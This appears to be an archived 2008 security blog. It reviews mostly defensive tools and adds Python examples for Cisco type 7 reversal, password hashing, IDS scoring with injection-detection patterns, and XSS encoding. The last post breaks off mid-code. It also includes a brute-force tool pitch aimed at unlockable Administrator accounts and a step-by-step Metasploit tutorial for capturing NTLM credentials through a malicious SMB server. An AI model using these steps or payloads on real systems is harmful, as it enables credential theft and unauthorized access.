7/23/08

Brute Force Tool for Terminal Services Server

This tool has been around for quite some time too, but it is still useful and fills a very specific niche: brute forcing logons to Windows Terminal Server.

TSGrinder was the first production Terminal Server brute force tool, and is now in release 2. The main idea is that the built-in Administrator account is not subject to account lockout, so it can be brute forced indefinitely. And having an encrypted channel to the TS logon process helps keep an IDS from catching the attempts (the flood of short RDP sessions from one source is still visible to anyone watching the connection logs, though).

TSGrinder is a dictionary-based attack tool, but it has some interesting features such as “l337” conversion of dictionary words, and it supports multiple attack windows from a single dictionary file. It also supports multiple password attempts within the same connection and lets you specify how many username/password combinations to try per connection.

You can download TSGrinder 2.0.3 here:

tsgrinder-2.03.zip

Note that the tool requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:

roboclient.zip

Or read more here.

7/17/08

Good Password Guidelines

It’s common sense for most people on the hacking side of computer security, as we know how easily a password is broken when it is only a few characters long or is a dictionary word (even one postfixed with a couple of digits falls to a hybrid dictionary attack pretty fast).

Even more so if you are using decent Rainbow Tables and the RainbowCrack method (a time/memory trade-off that precomputes the hash space once and then recovers unsalted hashes in seconds).

The basics of creating a secure password:

  • Include punctuation marks (,.;), special characters (!#$%^) and numbers.
  • Mix capital (uppercase), lowercase and space characters.
  • Create a unique acronym.
  • Use at least 8 characters; longer is better.

Some potential weaknesses to avoid:

  • Don’t use a password that is listed as an example or public.
  • Don’t use the same password you have been using for years.
  • Don’t use a password someone else has seen you type.
  • Don’t use a password that contains personal information (names, birthdays or dates that are easily related to you).
  • Don’t use words or acronyms that can be found in a dictionary.
  • Don’t use keyboard patterns (qwerty) or sequential numbers (12345).

Once you have a good password it’s equally important to keep your password secure:

  • Never tell anyone your password or use it where someone can observe it.
  • Never send your password by email or say it where others may hear.
  • Change your password periodically, and don’t cycle back to one you have used before.
  • Avoid writing your password down. (Keep it with you in a purse or wallet if you have to write down the password until you remember it.)

And never label that scrap of paper in any way; write it on the back of an old business card or something else that doesn’t indicate it’s a password.

Don’t give anyone who finds (or gains access to) your purse/wallet any clue of what the password means or what it is related to.

128 bits of entropy in a password requires a long, randomly generated passphrase, which wouldn’t be very usable; there has to be a trade-off somewhere between security and usability.

You can also use online password generators such as http://makemeapassword.com/. The problem with these is that, while they do create strong passwords, the results aren’t easy to remember, which rather defeats the purpose (and you are trusting a third-party site with every password it hands you).

Another option is a password safe that keeps all the hard-to-remember passwords in one place; the one I would recommend is Bruce Schneier’s, which is actually called “Password Safe”.

Password Safe is an Open Source (free) tool that lets you have a different password for every program and website you deal with, without having to remember all those usernames and passwords. Password Safe runs on PCs under Windows (95/98/NT/2000/XP).

You can find it here:

http://passwordsafe.sourceforge.net/

Any other inputs?


Security Cloak - Mask Against TCP/IP Fingerprinting for Windows

Security Cloak is designed to protect against TCP/IP stack fingerprinting and against identification/information leakage via the TCP timestamp and window options, by modifying the relevant registry keys. The settings used are based on p0f’s analysis of SYN packets. While the OS reported by other OS detection scanners was not identical to that reported by p0f, testing against Nmap, xprobe2, queso and cheops showed that they were unable to identify the correct operating system/version once the Security Cloak settings had been applied.

Note that in order to properly emulate some operating systems, the MTU must be changed. Most of these require an MTU of 1500 (the default for most network connections), but depending on your network connection this could degrade or interfere with your connectivity, so be sure to check your current MTU before applying these changes. It is recommended that you save all the original key values before using this program, in case your computer responds badly to the changes.

You can find the authors page here: http://www.craigheffner.com/security/

And a direct download here: Security Cloak

Browser Security Test - Check Your Browser NOW!

I know this is old, but a lot of people still don’t know about it.

It tests for current flaws, exploits and vulnerabilities in Mozilla, Opera and Internet Explorer.

Browser vulnerabilities are a serious issue now.

You can see which vulnerabilities they test for here and the statistics of the tests results here.

Total tests finished: 739828
Tests that found high risk vulnerabilities: 219614
Tests that found only medium or low risk vulnerabilities: 82803
Tests that found only low risk vulnerabilities: 9493
Tests that found no vulnerabilities: 427918

The FAQ is here.

Check Your Browser Security Now

Network Device Configuration Security Auditing Tool

Nipper performs security audits of network device configuration files. The report produced by Nipper includes detailed security-related issues with recommendations, a configuration report and various appendices. Nipper has a large number of configuration options, which are described on this page.

Nipper currently supports the following device types:

  • Cisco Switches (IOS)
  • Cisco Routers (IOS)
  • Cisco Firewalls (PIX, ASA, FWSM)
  • Cisco Catalysts (NMP, CatOS, IOS)
  • Cisco Content Service Switches (CSS)
  • Juniper NetScreen Firewalls (ScreenOS)
  • CheckPoint Firewall-1 (FW1)
  • Nokia IP Firewalls (FW1)
  • Nortel Passport Devices
  • SonicWALL SonicOS Firewalls (SonicOS)

The security audit includes details of the findings, together with detailed recommendations. The security audit can be modified using command line parameters or an external configuration file.

Network filtering audits include the following, all of which can be modified:

  • Rule lists end with a deny all and log
  • Rules allowing access from any source
  • Rules allowing access from network sources
  • Rules allowing access from any source port
  • Rules allowing access to any destination
  • Rules allowing access to destination networks
  • Rules allowing access to any destination service
  • Rules that do not log
  • Deny rules that do not log
  • Rules that are disabled
  • Rules that reject rather than drop
  • No bypass rules exist
  • Default rules

This update (0.11.5) includes improvements to support for Cisco PIX / ASA / FWSM firewalls, SonicWALL SonicOS firewalls, CheckPoint Firewall-1 and Nokia IP firewalls. It also includes a host of other updates.

The output from Nipper can be in HTML, LaTeX, XML or text formats. Furthermore, Nipper will reverse any Cisco type 7 passwords it identifies (type 7 is a reversible obfuscation, not a hash, so anyone holding the config has the plaintext); all other encrypted passwords can be written out to a John the Ripper file for strength testing. By default, input is read from stdin and output (in HTML format) is written to stdout.
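As an added illustration of what Nipper does with “password 7” lines (this is example code, not Nipper’s own), here is the type 7 reversal in Python. The constant key string is the one IOS uses; the sample config lines are constructed for this example. The point to take away is that a type 7 string is effectively plaintext, while a type 5 “secret” (salted MD5) is a hash and has to be attacked with a cracker instead.

```python
import re

# Fixed key string used by IOS/PIX for "type 7" password obfuscation.
XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decrypt(encoded: str) -> str:
    """Reverse a Cisco type 7 string: a 2-digit decimal key offset followed by hex pairs
    of (plaintext byte XOR XLAT[(offset + i) % len(XLAT)])."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 strings are an even number of hex digits, at least 4")
    offset = int(encoded[:2], 10)
    if offset >= len(XLAT):
        raise ValueError("key offset out of range")
    body = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ ord(XLAT[(offset + i) % len(XLAT)])) for i, b in enumerate(body))


def type7_encrypt(plaintext: str, offset: int = 0) -> str:
    """Inverse of type7_decrypt, to show the scheme is symmetric: anyone can do both directions."""
    if not 0 <= offset <= 15:
        raise ValueError("IOS only uses offsets 0..15")
    out = [f"{offset:02d}"]
    for i, ch in enumerate(plaintext.encode("latin-1")):
        value = ch ^ ord(XLAT[(offset + i) % len(XLAT)])
        out.append(f"{value:02X}")
    return "".join(out)


# Matches "password 7 <hex>" and "key 7 <hex>" lines. "secret 5 $1$..." is a salted MD5
# hash and is deliberately not matched, because it cannot be reversed.
TYPE7_LINE = re.compile(r"\b(?:password|key)\s+7\s+([0-9A-Fa-f]{4,})\s*$")


def find_type7(config: str):
    """Return [(config line, recovered plaintext), ...] for every type 7 password in a config."""
    found = []
    for raw in config.splitlines():
        line = raw.strip()
        m = TYPE7_LINE.search(line)
        if m:
            found.append((line, type7_decrypt(m.group(1))))
    return found


# Constructed sample, not a real device configuration.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable secret 5 $1$abcd$ThisIsNotReversibleXXXXXXXX
username admin password 7 0822455D0A16
line vty 0 4
 password 7 094F471A1A0A
 login
"""

if __name__ == "__main__":
    for line, plain in find_type7(SAMPLE_CONFIG):
        print(f"{line!r} -> {plain!r}")
```

Both sample strings decode to “cisco” (they differ only in the key offset), which is why two devices with the same type 7 password rarely show the same string in their configs: the offset, not the key, is what varies.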

Nipper is available for Linux, Windows and other platforms. You can download Nipper here:

Nipper 0.11.5

Or read more here.

FTester - Firewall Tester and IDS Testing tool

The Firewall Tester (FTester) is a tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities.

The tool consists of two Perl scripts, a packet injector (ftest) and a listening sniffer (ftestd). The first script injects custom packets, defined in ftest.conf, with a signature in the data part, while the sniffer listens for such marked packets. Both scripts write a log file in the same format, so if they are run on hosts placed on opposite sides of a firewall, a diff of the two files (ftest.log and ftestd.log) shows which packets were unable to reach the sniffer because of filtering rules. Stateful inspection firewalls are handled with the ‘connection spoofing’ option. A script called freport is also available to parse the log files automatically.

Of course this is not an automated process, ftest.conf must be crafted for every different situation. Examples and rules are included in the attached configuration file.

The IDS (Intrusion Detection System) testing feature can be used either with ftest alone or with the additional support of ftestd for handling stateful-inspection IDS; ftest can also apply common IDS evasion techniques. Instead of the native configuration syntax, the script can also process a Snort rule definition file directly.

Features:

  • Firewall testing
  • IDS testing
  • Simulation of real TCP connections for stateful inspection firewalls and IDS
  • Connection spoofing
  • IP fragmentation / TCP segmentation
  • IDS evasion techniques

Requirements:

The following Perl modules are required: Net::RawIP, Net::PcapUtils, NetPacket

You can download FTester here:

ftester-1.0.tar.gz

Or you can read more here.

A Simple Guide To Keeping Your Inbox Clean

In my opinion, the best way to keep clean of spam is simple:

The first rule is NEVER reply to spam, NEVER click the unsubscribe link and NEVER e-mail to the unsubscribe address.

These are simply underhand tactics to harvest ‘active’ e-mail addresses.

Some other tips to avoid getting spammed in the first place:

1) Never use your real e-mail address in newsgroups; this is the easiest place to get picked up by a spam bot. Use something like l33t-no-spam-at-i.hate.spam-darknet.org.uk

Then in your signature put remove -no-spam and i.hate.spam- to reply.

2) Never put your e-mail address on a publicly viewable web page, as it will be spidered by Google and grabbed by spammers.

If you do need to put an e-mail address use the simple JavaScript below to protect it:


3) If you do put your e-mail address anywhere try and obscure it in some way.

4) Create a disposable e-mail address (Hotmail or Yahoo) that you rarely check, for signing up to websites. Most commercial sites will bombard you with spam after you’ve signed up for whatever they are offering. Some also sell your address to list makers or other spammers, so never give your *real* e-mail address to anyone except people you want to e-mail you.

5) Don’t share your e-mail address, and skip compulsory registration.* This goes along with number 4: if possible don’t register, and if you do, make sure you untick the ‘spam me with a newsletter’ box.

Well, 5) may be a problem. Most of the time a Google search turns up a site with the answer to our problem, but a large proportion of them require registration (Experts Exchange, for example).

That’s where BugMeNot comes into play.

BugMeNot is a database of login information (usernames and passwords) that you can use to access sites that require registration. The site has a voting mechanism that lets you vote for the username/password that worked for you, so the login combination with the most votes is listed first for a given site.

You can also add new login information to the database for sites where you can’t find a login.

There is also a BugMeNot plugin for Firefox that enters the login information for a site with a single click of the mouse. The plugin was made for older versions of Firefox and has been reported not to work with the most recent versions.

BugMeNot is not the solution for everything, and sometimes you need to ’share’ your e-Mail with others.

DEA (Disposable e-Mail Address) services let you give an e-mail address to doubtful sites without worrying that it will be used to spam you.

There are various sites providing DEA’s. Top 10 sites.

In my personal and humble opinion, I suggest Mailinator and Wuzup Mail. Both of them support RSS.

Mailinator creates a random e-mail address every time you refresh the site, which you can then use to register on the more doubtful sites.

WuzupMail lets you choose your username and saves the e-mails you receive for 7 days.

Using BugMeNot for compulsory registration and a DEA to keep your personal address from being used for spam, you will reduce the amount of spam reaching your inbox every day (if you get any).

Also remember that Thunderbird has some pretty good Bayesian spam filtering built in; once it has learned your e-mail pattern it is very effective, so if you are still getting spam you can try that.

* If you need to share your personal e-mail address, do it in a creative way. Most web spiders (crawlers) are able to spot addresses like jon at doe dot com.

Be creative, jon at |NO_SPAM_PLEASE| dot com, etc, etc.


Open Source Intrusion Prevention - HLBR

It’s good to see work on open source tools in the countermeasure department as well as in the attack and penetration arena.

It’s a shame that Snort and Nessus have gone semi-commercial.

I hope more people invest their time in good IDS, Firewall and IPS systems, I love things like IPCop and hope to see more products like HLBR.

HLBR is a Brazilian project, started in November 2005 as a fork of the Hogwash project (started by Jason Larsen in 1996).

HLBR is an IPS (Intrusion Prevention System) that filters packets directly at layer 2 of the OSI model (so the machine doesn’t even need an IP address). Detection of malicious/anomalous traffic is done by signature-based rules, and the user can add more. It is an efficient and versatile IPS, and it can even be used as a bridge in front of honeypots and honeynets. Since it doesn’t use the operating system’s TCP/IP stack, it can be “invisible” on the network, to normal access and to attackers alike.

Since version 1.0, released on March 5th 2006, HLBR can use regular expressions to detect intrusion attempts, viruses, worms and phishing.

You can view the entire HLBR README file here.

Go to the HLBR Homepage for more information and downloads.

Source Code Analysis Risk Evaluation Tool

The Source Code Analysis Risk Evaluation project is a study to create a security complexity metric that analyzes source code and provides a realistic and factual representation of the potential for that source code to produce a problematic binary. The metric does not say that the binary will be exploited, nor does it perform static analysis for known limitations such as vulnerabilities. It does, however, flag code for each interaction type or control, and lets the developer see which Operational Security (OpSec) holes are not protected, even if it cannot yet say how effective that protection is.

This computation yields a final SCARE value, like the RAV, where 100% is the proper balance between controls and OpSec holes with no Limitations. Anything less shows an imbalance, where too few Controls protect the OpSec holes or where Limitations in OpSec and Controls degrade the security.

The SCARE analysis tool is run against source code; currently only C is supported. The output file lists all the operational interactions that need controls (the current version does not yet say whether and which controls are already there). At the bottom of the list are three numbers: Visibilities, Access and Trusts. These three numbers can be plugged into the RAV calculation spreadsheet available at http://www.isecom.org/ravs. The resulting Delta value is subtracted from 100 to give the SCARE percentage, which indicates how complex this particular application is to secure. The lower the value, the worse the SCARE.

At this stage the tool cannot yet tell which interactions already have controls, or whether those controls are applicable; once that is available it will change the RAV but not the SCARE. Nor will the SCARE yet tell you where the bugs are in the code; however, if you are bug hunting, it will extract every place where user inputs and trusts involving user-accessible resources can be found.

The methodology itself is designed to work for any programming language; the tool currently demonstrates it for C, and ISECOM need input and feedback from developers of other languages to expand it further.

If you are interested in helping with this project please contact ISECOM.

You can download SCARE here:

scare_analyst.zip

Or you can read more here.

Password Hasher Firefox Extension

Well, seeing as we were talking about breaking passwords, here’s a Firefox tool to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

  • Strong passwords that are hard to guess.
  • Different passwords at each site.
  • Periodically changing existing passwords.

Why you probably aren’t practicing good security:

  • Strong passwords are difficult to remember.
  • Juggling a multitude of passwords is a pain.
  • Updating passwords compounds the memorization problem.

How Password Hasher helps:

  • Strong passwords are automatically generated.
  • The same master key produces different passwords at many sites.
  • You can quickly upgrade passwords by “bumping” the site tag.
  • You can upgrade the master key without updating all sites at once.
  • It supports different length passwords.
  • It supports special requirements, such as digit and punctuation characters.
  • All data is saved to the browser’s secure password database.
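To make the feature list concrete, here is the idea behind a site-specific password hasher in Python. This is an added example, not the extension’s own code or algorithm: it derives each site password as HMAC-SHA256(master key, site tag), encodes the digest into printable characters, and forces in a digit and a punctuation character when a site demands them. The “bump” operation is a trailing counter on the site tag, so changing one site’s password never means changing the master key. Master key and site tags below are made up.

```python
import base64
import hashlib
import hmac
import re
import string

PUNCT = "!#$%&*+-=?@"                      # punctuation most sites accept
ALPHABET = string.ascii_letters + string.digits + PUNCT


def _needs(pw, allowed):
    return not any(c in allowed for c in pw)


def derive_password(master_key, site_tag, length=12, require_digit=True, require_punct=True):
    """Deterministic site password from one master key; same inputs always give the same output."""
    if not 6 <= length <= 43:
        raise ValueError("length must be between 6 and 43")
    digest = hmac.new(master_key.encode("utf-8"), site_tag.encode("utf-8"), hashlib.sha256).digest()
    b64 = base64.b64encode(digest).decode("ascii").rstrip("=")     # 43 chars of A-Z a-z 0-9 + /
    pw = list(b64[:length].replace("+", "!").replace("/", "#"))     # keep everything in ALPHABET
    # Two distinct positions, chosen from the digest, for characters a site insists on.
    p_digit = digest[0] % length
    p_punct = digest[1] % length
    if p_punct == p_digit:
        p_punct = (p_punct + 1) % length
    if require_digit and _needs(pw, string.digits):
        pw[p_digit] = string.digits[digest[2] % 10]
    if require_punct and _needs(pw, PUNCT):
        pos = p_punct
        # Don't wipe out the only digit (it can only be a natural one sitting at p_punct).
        if pw[pos].isdigit() and sum(c.isdigit() for c in pw) == 1:
            pos = p_digit
        pw[pos] = PUNCT[digest[3] % len(PUNCT)]
    return "".join(pw)


def bump(site_tag):
    """'Bump' a site tag: increment a trailing counter, or start one, so the derived password changes."""
    m = re.fullmatch(r"(.*?)(\d+)", site_tag)
    if m:
        return f"{m.group(1)}{int(m.group(2)) + 1}"
    return site_tag + ":1"


if __name__ == "__main__":
    master = "correct horse battery staple"                 # constructed master key
    for tag in ("example.com", bump("example.com"), "bank.example.net"):
        print(f"{tag:20s} {derive_password(master, tag)}")
```

Two design points the feature list hints at: the master key never leaves the client (only a keyed hash does, one site at a time), and because derivation is deterministic nothing has to be stored except the site tag and its bump counter.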

You can download Password Hasher here:

passhash-1.0.5.xpi

Or read more here.

Security Layer & Intrusion Detection for PHP Based Web Applications

Another protection for those building websites and web applications; as that is the most common attack vector nowadays, I think it’s important to be extra safe on this front.

PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input; it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules, any attack is given a numerical impact rating, which makes it easy to decide what action should follow the hacking attempt.

This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.
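The scoring model described above (rules with weights, a summed impact, and an action chosen by threshold) is easy to see in miniature. The following is an added example in Python, not PHPIDS code: the six rules, the thresholds and the sample requests are all constructed for the illustration, and the real PHPIDS filter set is far larger and runs many more normalization passes before matching. Note that, as the text says, nothing is stripped or altered; the caller only gets a score and the list of rules that fired.

```python
import re
from urllib.parse import unquote_plus

# Illustrative rules: (id, pattern, impact, tags). Written for this example only.
RULES = [
    (1, re.compile(r"<\s*script\b", re.I), 4, ("xss",)),
    (2, re.compile(r"\bon(?:load|error|mouseover)\s*=", re.I), 4, ("xss",)),
    (3, re.compile(r"\bjavascript\s*:", re.I), 3, ("xss",)),
    (4, re.compile(r"['\"]\s*(?:or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I), 5, ("sqli",)),
    (5, re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S), 6, ("sqli",)),
    (6, re.compile(r"(?:\.\./|\.\.\\){2,}"), 3, ("lfi", "traversal")),
]


def normalize(value: str) -> str:
    """One URL-decoding pass so %3Cscript%3E is seen as <script>. PHPIDS runs many more
    converters (entity decoding, comment stripping, ...); this is the minimum to make the point."""
    return unquote_plus(value)


def scan(params: dict) -> dict:
    """Score a request's parameters without modifying them. Returns the summed impact and
    the list of (parameter, rule id, tags) that fired; the caller decides what to do."""
    hits, impact = [], 0
    for name, value in params.items():
        text = normalize(value)
        for rule_id, pattern, weight, tags in RULES:
            if pattern.search(text):
                hits.append((name, rule_id, tags))
                impact += weight
    return {"impact": impact, "hits": hits}


def react(impact: int) -> str:
    """Map an impact to an action. Thresholds are illustrative; tune them to your own traffic."""
    if impact == 0:
        return "ignore"
    if impact < 5:
        return "log"
    if impact < 10:
        return "log+mail"
    return "end-session"


# Constructed requests, as a framework would hand them over after parsing the query string.
REQUESTS = {
    "benign": {"q": "schneier password safe", "page": "2"},
    "xss":    {"q": "%3Cscript%3Ealert(1)%3C%2Fscript%3E"},
    "sqli":   {"id": "1' OR '1'='1"},
    "combo":  {"q": "<script>x</script>", "id": "' UNION SELECT password FROM users--"},
}

if __name__ == "__main__":
    for label, params in REQUESTS.items():
        result = scan(params)
        print(f"{label:7s} impact={result['impact']:2d} action={react(result['impact'])} hits={result['hits']}")
```

The interesting property is additive: two individually “log only” findings in one request push it over the mail or session-termination threshold, which is how a probing attacker gets cut off without any single rule having to be aggressive.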

PHPIDS enables you to see who’s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it’s licensed under the LGPL!

It’s a fairly mature product with some good documentation (docs are here) and it’s easy to programmatically grab the latest version of the filter rules (it’s just an XML file).

You can see a demo here where you can try some injections or XSS and see the warnings.

http://demo.php-ids.org/

Download the latest version of PHPIDS here:

PHPIDS 0.4.6 zip
PHPIDS 0.4.6 tar.gz

There are other versions for Drupal and WordPress on the download page.

Or read more here.

.NET Intrusion Detection System

This tool is another one on the protection side, again for web-based applications but this time for .NET: it’s called .NETIDS (.NET Intrusion Detection System). It detects attacks on web applications and gives the developer the chance to react. The project files include filter rules and function stubs for reacting to possible intrusions, which may vary from logging to warning or redirecting the user.

The goal of this project is to provide an additional layer of protection to any .NET application it is used with. This includes the detection of XSS, directory traversal and SQL injection, protection against overwriting JS objects and methods, advanced logging functions, categorization and tagging of the individual filter rules, and interfaces for reacting to possible intrusions.

.NETIDS is actually a port of PHPIDS, which we’ve mentioned before, to the .NET Framework. The library is fully CLS compliant and implements exactly the same filter sets as the PHP version.

.NETIDS can be used in three ways.

The first method is by inheriting your ASP.NET pages from the SecurePage class. This offers an easy and customizable way to scan page input. If you are relatively new to the .NET Framework this is the simplest way to secure your applications.

The second method is more customizable but harder to implement for novice programmers and involves working directly with the IDS objects.

The third method (available in the upcoming release) is by using the supplied HttpModule.

You can find the documentation here:

http://www.the-mice.co.uk/dotnetids/docs/

You can download .NET IDS v.0.1.3.0 here:

dotnetids-bin-0_1_3_0.zip

Or you can read more here.

Python Advanced Wardialing System

Now this is an oldskool topic, wardialling! Some people still ask me about wardialling tools though, so here’s one I found recently written in Python.

PAW / PAWS is wardialing software written in Python. It is designed to scan for ISDN (PAWS only) and “modern” analog modems (running at 9.6 kbit/s or higher). Despite their martial-sounding name, wardialing tools are used to find unauthorized modems so that they can be disabled, making access to the internal network harder.

For PAW, list all the numbers you want dialed in the (text) file “dial.lst”, one per line: numbers only, no spaces, plus signs, dashes or slashes please.

For PAWS, the numbers are accompanied by the ISDN modes to be tested, in the (text) file “dial.lst”, in exactly the format you find in the example file (you can delete individual ISDN types, though), one per line; again numbers only, no spaces, plus signs, dashes or slashes. There is effectively no syntax check of any kind, so be careful.

Make sure the device your modem is attached to is set correctly in the variable “tty” at the top of paw.py.

Then simply run “./paw.py” or “./paws.py” and watch: a verbatim full log will be written to paw_dialing.log, with CR, LF and TAB translated into readable equivalents. For PAW an additional summary is written as a CSV file, paw_dialing.csv.

You can download PAW/PAWS here:

paw.tar.gz (analog wardialer only)

paws.tar.gz (ISDN & analog wardialing)

Or read more here.

Domain Information Gathering Tool

The first stage of a penetration test is usually information gathering, both passive and active (enumeration). This is where tools like dnsenum come in; the purpose of DNSenum is to gather as much information as possible about a domain.

The program currently performs the following operations:

  1. Get the host’s address (A record).
  2. Get the nameservers (threaded).
  3. Get the MX records (threaded).
  4. Perform AXFR (zone transfer) queries on the nameservers (threaded).
  5. Get extra names and subdomains via Google scraping (Google query = “allinurl: -www site:domain”).
  6. Brute force subdomains from a file, optionally recursing into subdomains that have NS records (all threaded).
  7. Calculate class C network ranges and perform whois queries on them (threaded).
  8. Perform reverse lookups on the netranges (class C and/or whois netranges) (threaded).
  9. Write the IP blocks to the file domain_ips.txt.

The output file domain_ips.txt will contain non-contiguous IP blocks:

127.0.0.1/32
127.0.0.8/31
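Steps 7 to 9 above are pure address arithmetic, so they are easy to reproduce. The following is an added example in Python (not dnsenum’s Perl code) that takes the addresses a scan has resolved, derives the class C ranges used for whois and reverse sweeps, and collapses the hosts into the minimal non-contiguous CIDR blocks that domain_ips.txt holds. The sample addresses are constructed from the RFC 5737 documentation ranges.

```python
import ipaddress


def class_c_ranges(ips):
    """Step 7: the /24 ("class C") networks the discovered hosts fall in, which is the unit
    used for the whois lookups and the reverse sweep."""
    nets = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in ips}
    return [str(n) for n in sorted(nets)]


def reverse_sweep_targets(networks):
    """Step 8: every address a reverse (PTR) sweep of the given netranges would query."""
    return [str(h) for net in networks for h in ipaddress.ip_network(net).hosts()]


def collapse_blocks(ips):
    """Step 9: the smallest set of CIDR blocks covering exactly the given hosts and nothing else.
    Contiguous, aligned hosts merge (two neighbours -> /31, four -> /30); the rest stay /32."""
    hosts = [ipaddress.ip_network(ip) for ip in set(ips)]          # each host as a /32
    return [str(n) for n in sorted(ipaddress.collapse_addresses(hosts))]


def write_domain_ips(path, ips):
    """Write the collapsed blocks one per line, the format the text shows for domain_ips.txt."""
    blocks = collapse_blocks(ips)
    with open(path, "w") as fh:
        fh.write("\n".join(blocks) + "\n")
    return blocks


# Constructed sample: addresses resolved for a target domain (documentation ranges only).
SAMPLE_IPS = ["192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.13", "198.51.100.7", "192.0.2.200"]

if __name__ == "__main__":
    print("class C ranges:", class_c_ranges(SAMPLE_IPS))
    print("PTR queries for first range:", len(reverse_sweep_targets(class_c_ranges(SAMPLE_IPS)[:1])))
    print("domain_ips.txt blocks:", collapse_blocks(SAMPLE_IPS))
```

Note that 192.0.2.10 through .13 does not become one /30: a /30 must start on a multiple of four, so the four hosts collapse to two /31s. That alignment rule is why the output file is “non-contiguous blocks” rather than one summary prefix.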

You can download DNSenum v1.2 here:

dnsenum1.2.tar.gz

Or you can read more here.

Security & System Auditing Tool for UNIX/Linux

Lynis is an auditing tool for Unix (specialists). It scans the system and the software available on it to detect security issues. Besides security-related information it also gathers general system information, installed packages and configuration mistakes.

This is a tool that might be useful for both penetration testers performing white box tests and system admins trying to secure their own systems.

This software aims to assist with automated auditing, software patch management, and vulnerability and malware scanning of Unix-based systems. It can be run without prior installation, so it can be kept on read-only storage (USB stick, CD/DVD).

What is Lynis NOT:
- Not a hardening tool: Lynis does not fix things automatically, it only reports (and makes suggestions).

Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:

  • Available authentication methods
  • Expired SSL certificates
  • Outdated software
  • User accounts without password
  • Incorrect file permissions
  • Firewall auditing

You can download Lynis 1.1.7 here:

lynis-1.1.7.tar.gz

Or you can read more here.

Firewall Auditing & Ruleset Analyzer Tool

FWAuto (Firewall Rulebase Automation) is a Perl script and should work on any system with Perl installed. Feed it the running config of a PIX firewall and it will analyze the rule base, give you a list of weak rules and store the results in multiple output files.

Maybe there have been times when you have pentested a firewall: as part of a grey box engagement you were assigned the task of auditing a HUGE firewall rulebase and were stuck on how to proceed, simply because of the sheer volume of information. This Perl tool was created to help audit a rulebase and narrow down the weak rules. Current support is just for Cisco PIX, though the framework was designed to scale across multiple firewalls without major changes.

Updates

  • Outputs now available in reasonably neat HTML format
  • No more complex command line arguments, everything’s in a config file
  • More ports added in vulnerable ports section
  • Options available to obtain detailed/non detailed output

You can download fwauto v.1.1 here:

fwauto_v1.1.zip

Or read more here.

How to use Metasploit as a Man-in-the-Middle Password Stealer

> Requirements:

1.) Metasploit 2.7 on a Unix-based machine
2.) http://grutz.jingojango.net/exploits/smb_sniffer.pm


-> What we're going to do:

The basic idea of stealing passwords with Metasploit is to bind our malicious SMB server to port 139 and listen for incoming connections. Every client that connects authenticates using the NTLM protocol (a challenge/response exchange), and our server simply records the responses.

We will use the smb_sniffer module, but it won't work without placing it in the Metasploit exploits/ directory.


-> Let's get it on:

So let's begin.
1.) Start Metasploit with root privileges -> sudo msfconsole
2.) Select the smb_sniffer -> use smb_sniffer
3.) Set the password file -> set PWFILE /tmp/password_file.txt
4.) Start our malicious SMB service -> exploit
5.)When there is an incoming request (either because we tricked or forced the client into connecting) it should look like this: "[*] New connection from -ip-"
6.) Look into /tmp/password_file.txt and voilà, there are the hashes. Note that what the sniffer records are LM/NTLM challenge-response pairs, not the accounts' password hashes themselves; they have to be cracked offline against the challenge the sniffer issued before they are of any use.

7/13/08

10 Reasons websites get hacked.

Below is the OWASP Top 10 list of web application vulnerabilities, with a description of each problem and some examples.

So here it starts:

1. Cross site scripting (XSS)

The problem: The most prevalent and pernicious Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, rejecting anything that is not specified on the whitelist as known good. This is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, apply the appropriate encoding to all output data for the context it lands in (HTML body, attribute, URL, script). Validation allows the detection of attacks, and encoding prevents any script injection that gets through from running in the browser, OWASP says.
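The two halves of that advice, whitelist validation on the way in and context-specific encoding on the way out, look like this in Python. This is an added example, not from OWASP or the original post; the username rule, the payloads and the markup are constructed. The vulnerable renderer is kept beside the safe one so the difference is visible.

```python
import html
import re
from urllib.parse import quote

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value: str) -> bool:
    """Whitelist validation: only characters known to be good pass; everything else is rejected.
    A rejection is also your detection signal, so log it."""
    return USERNAME_RE.fullmatch(value) is not None


def validate_username(value: str) -> str:
    if not is_valid_username(value):
        raise ValueError("username contains characters outside the allowed set")
    return value


def render_comment_vulnerable(comment: str) -> str:
    return f"<p>{comment}</p>"                   # untrusted data dropped straight into HTML


def render_comment(comment: str) -> str:
    """Output encoding for the HTML body context: & < > " ' become entities, so whatever
    survived validation is displayed as text rather than parsed as markup."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


def render_search_link(query: str) -> str:
    """Output encoding for a URL query-string context: percent-encode everything that is not
    unreserved. The result is also safe inside the quoted attribute, because no '"' or '<' survives."""
    return f'<a href="/search?q={quote(query, safe="")}">search again</a>'


# Constructed payloads for the two contexts.
PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'

if __name__ == "__main__":
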